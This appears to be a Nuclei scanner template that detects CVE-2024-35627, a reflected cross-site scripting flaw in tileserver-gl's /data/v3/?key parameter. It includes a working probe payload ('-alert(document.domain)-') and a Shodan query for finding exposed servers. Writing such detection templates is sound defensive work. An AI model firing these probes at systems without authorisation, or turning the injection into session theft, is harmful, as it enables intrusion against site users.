id: CVE-2024-35627 info: name: TileServer API - Cross Site Scripting author: DhiyaneshDK severity: medium description: | tileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key. impact: | Attackers can inject malicious scripts via the key parameter, potentially compromising user sessions or stealing sensitive information. remediation: | Update tileserver-gl to a version later than v4.4.10 that patches the XSS vulnerability. reference: - https://gist.github.com/SaleSlave/e23d49e7f8eb937784d15c2c2fc34fca classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-35627 cwe-id: CWE-79 epss-score: 0.00957 epss-percentile: 0.59179 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-1258058404 tags: cve,cve2024,tileserver,xss,vuln http: - method: GET path: - "{{BaseURL}}/data/v3/?key=%27-alert(document.domain)-%27" matchers-condition: and matchers: - type: word part: body words: - "TileServer" - "'-alert(document.domain)-'" condition: and - type: word part: content_type words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100df9d77e047c9a555cf299068645210a9ceeaf39a7cfd60388bc2d5bce94c43e402205fe75c137c82e6080bcde9a262c72c36c30196eb6b0e4a23d70ca6087340111a:922c64590222798bb761d5b6d8e72950